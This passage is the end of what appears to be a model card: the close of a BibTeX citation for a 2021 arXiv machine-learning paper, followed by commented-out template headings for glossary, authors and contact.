year={2021},
eprint={2101.06983},
archivePrefix={arXiv},
primaryClass={cs.LG}
}
```
<!--
## Glossary
*Clearly define terms in order to be accessible across audiences.*
-->
<!--
## Model Card Authors
*Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.*
-->
<!--
## Model Card Contact
*Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.*
-->